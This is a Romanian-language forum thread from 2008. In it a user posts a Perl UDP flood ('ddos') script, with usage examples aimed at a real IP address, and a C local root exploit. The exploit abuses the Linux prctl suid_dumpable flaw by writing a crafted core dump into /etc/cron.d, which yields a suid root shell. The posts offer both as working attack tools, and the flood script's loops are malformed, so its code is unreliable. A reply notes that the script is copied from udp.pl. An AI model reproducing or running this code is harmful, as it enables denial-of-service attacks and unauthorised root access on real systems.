ddos script in pearl

AlucardHao · March 26, 2008

in sfarsit am reusit sa realizez si eu un mic script de ddos in pearl... e rudimentar; recunosc..... dar merge destul de bine

#!/usr/bin/perl
#####################################################
# udp flood.
#
# RstZone.
#
# --/AlucardHao
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0 <ip-u> <port-u> <timp de executie>\n";
 printf "daca port = 0 inseamna ca exploitu ca ataci  toate porturile\n";
printf "daca timp de executie = 0; scriptu va rula la infinit\n\n";
printf "exemplu de folosire:\n";
printf "./ddos.pl 86.125.124.63 0 0  -----> va rula la infinit\n\n";
printf "./ddos.pl 86.125.124.63 22 60  -----> va ataca portu 22 timp de 60 de secunde\n\n";
 exit(1);
}

my ($ip,$port,$size,$time);
 $ip=$ARGV[0];
 $port=$ARGV[1]; 
 $time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf "-][-Attack Started-][- 
-][-Made By AlucardHao-][-
*
**
***
****
*****
******
*******

-][-Aquring External IP-][-
*
**
***
****
*****

-][-65500 Pentru a intrerupe scriptu apasati CTRL+C .. Atacul incepe-][-\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
 goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &");
 goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
 goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
 system("(sleep $time;killall -9 udp) &"); 
 goto randpackets;
}

packets:
for ( {
 $size=$rand x $rand x $rand;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
} 

randpackets:
for ( {
 $size=$rand x $rand x $rand;
 $port=int(rand 65500) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

AlucardHao · March 26, 2008

bazandu-ma pe exploitu de prctl() facut de Tienns pentru fedora core 1 eu si cu un coleg de clasa am realizat acest script in c... care ofera shell de root ...

noi am testat pe redhat ubuntu fedora knoppix astrumi morphis stryunx ... toate acestea avand versiunea kernelulu >=2.6.13


/******************************************
 * Linux >= 2.6.13 prctl() kernel exploit *
 *					  *
 *          (C) AlucarHao                 *
 *                                        *
 *                                        *
 ******************************************/

#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <signal.h>
#include <stdlib.h>
#include <time.h>

#define CROND "/etc/cron.d"
#define BUFSIZE 1024


struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};

char	crontemplate[]=
"#/etc/cron.d/core suid_dumpable exploit\n"
"SHELL=/bin/sh\n"
"PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
"#%s* * * * *	root	 chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";

char	cronstring[BUFSIZE];
char	fname[BUFSIZE];

struct timeval te;

void sh(int sn) {
	execl(fname, fname, (char *) NULL);
}


int	main(int argc, char *argv[]) {

	int nw, pid;

	if (geteuid() == 0) {
		printf("[+] obtinerea de rootshell\n");
		setuid(0);
		setgid(0);
		if (execl("/bin/sh", "/bin/sh", (char *) NULL)) {
			perror("[-] execle");
			return 1;
		}
	}

	printf("\\suidsafe exploit/\n\n(C) AlucardHao\n\n");

	/* get our file name */
	if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) {
		perror("[-] readlink");
		printf("Asta nu e fatal, rescrie exploitul\n");
	}

	if (signal(SIGUSR1, sh) == SIG_ERR) {
		perror("[-] signal");
		return 1;
	}
	printf("[+] Instaleaza handler-ul de semnal\n");

	/* Let us create core files */
	setrlimit(RLIMIT_CORE, &myrlimit);
	if (chdir(CROND) == -1) {
		perror("[-] chdir");
		return 1;
	}

	/* exploit the flaw */
	if (prctl(PR_SET_DUMPABLE, 2) == -1) {
		perror("[-] prtctl");
		printf("Versiunea de kernel e >= 2.6.13 ?\n");
		return 1;
	}

	printf("[+] Sunt suidsafe!\n");

	/* Forge the string for our core dump */
	nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid());
	if (nw >= sizeof(cronstring)) {
		printf("[-] cronstring is too small\n");
		return 1;
	}
	printf("[+] String malitios implementat\n");

	if ((pid=fork()) == -1) {
		perror("[-] fork");
		return 1;
	}

	if (pid == 0) {
		/* This is not the good way to do it  */
		sleep(120);
		exit(0);
	}

	/* SEGFAULT the child */
	printf("[+] Segmentation fault child\n");
	if (kill(pid, 11) == -1) {
		perror("[-] kill");
		return 1;
	}
	if (gettimeofday(&te, NULL) == 0) 
		printf("[+] In asteptarea exploitului de a reusi (~%ld seconds)\n", 60 - (te.tv_sec%60));
	sleep(120);

	printf("[-] Pare se ca exploitul a dat gres\n");

	return 1;
}

amprenta · March 26, 2008

Asta ii taticu udp.pl macar schimba numele variabilelor .

killall -9 udp va mai avea efect ?

AlucardHao · March 26, 2008

da ... killall -9 udp va avea efect...

Vhaerun · March 26, 2008

PEARL is usually written capitalized, and should not be confused with Perl.

Sign In

ddos script in pearl

Recommended Posts

AlucardHao

AlucardHao

amprenta

AlucardHao

Vhaerun

Join the conversation

Browse

Activity

Pages